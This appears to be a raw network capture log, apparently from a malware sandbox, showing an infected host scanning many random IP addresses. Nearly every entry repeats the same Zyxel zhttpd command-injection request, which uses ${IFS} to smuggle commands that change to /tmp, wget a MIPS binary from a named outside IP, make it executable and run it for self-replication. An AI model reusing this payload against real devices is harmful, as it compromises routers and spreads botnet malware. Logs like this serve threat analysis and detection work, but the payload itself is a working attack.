                                                        Feb 2, 2024 06:20:46.574392080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        452192.168.2.1454140104.44.14.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:46.574448109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        453192.168.2.1459658182.166.126.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:46.574485064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        454192.168.2.143331077.22.226.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.578892946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        455192.168.2.1459490223.74.104.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.578936100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        456192.168.2.145839251.188.111.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.578958988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        457192.168.2.1457784146.32.161.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.578985929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        458192.168.2.1434064175.245.103.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.579029083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        459192.168.2.145120497.253.103.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.579071999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        460192.168.2.1441304184.19.60.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.579114914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        461192.168.2.1443928125.53.234.118443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.579132080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        462192.168.2.1437708161.87.83.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.579253912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        463192.168.2.1453516162.227.109.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:47.579289913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        464192.168.2.143345677.122.41.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:48.583622932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        465192.168.2.1452800138.47.202.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:48.583674908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        466192.168.2.1441210166.150.111.10443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:48.583719969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        467192.168.2.1452340161.98.166.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:49.587738037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        468192.168.2.1439160187.204.161.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:49.587793112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        469192.168.2.1458506129.37.63.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591538906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        470192.168.2.1436934205.34.31.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591584921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        471192.168.2.143717051.88.191.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591612101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        472192.168.2.1439892159.144.32.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591672897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        473192.168.2.1457082142.81.241.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591698885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        474192.168.2.1433436144.221.65.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591797113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        475192.168.2.1454352168.238.22.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:50.591837883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        476192.168.2.1444010178.179.131.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:51.593883991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        477192.168.2.143358490.190.4.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:51.593935966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        478192.168.2.14468028.100.123.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:51.594007015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        479192.168.2.1452954116.128.150.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:52.598617077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        480192.168.2.1443176112.250.50.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:52.598676920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        481192.168.2.143383239.83.247.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:52.598725080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        482192.168.2.1449872106.56.198.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:52.598764896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        483192.168.2.1444956164.98.197.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:52.598865986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        484192.168.2.144638095.177.54.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:53.603315115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        485192.168.2.145657454.215.222.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:53.603365898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        486192.168.2.1451188139.209.165.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:53.603424072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        487192.168.2.144755875.82.255.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624134064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        488192.168.2.145628283.169.234.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624166012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        489192.168.2.1433802188.25.4.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624218941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        490192.168.2.1457204188.146.200.101443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624243021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        491192.168.2.143810845.173.194.172443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624294043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        492192.168.2.1444166173.144.240.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624341965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        493192.168.2.145721839.106.28.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624375105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        494192.168.2.145534652.58.232.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624417067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        495192.168.2.143336268.216.84.63443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624455929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        496192.168.2.1443808167.94.113.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624486923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        497192.168.2.1460744142.241.51.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624516964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        498192.168.2.1447120176.224.21.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624547958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        499192.168.2.143615262.253.94.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624619961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        500192.168.2.1450308223.161.114.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624643087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        501192.168.2.1455934145.140.213.152443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624664068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        502192.168.2.1437652206.224.230.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624716997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        503192.168.2.144475887.172.189.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624746084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        504192.168.2.1443828152.158.14.108443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624773979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        505192.168.2.1453824133.187.60.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624803066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        506192.168.2.1439908155.157.199.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624867916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        507192.168.2.143460084.133.244.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624901056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        508192.168.2.145055289.77.223.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624952078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        509192.168.2.144677258.95.102.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.624963045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        510192.168.2.144782277.93.59.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625010967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        511192.168.2.144714894.123.54.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625056028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        512192.168.2.144548238.143.250.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625083923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        513192.168.2.145898625.37.186.76443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:54.625138998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        514192.168.2.1459670187.194.105.199443
                                                        TimestampBytes transferredDirectionData
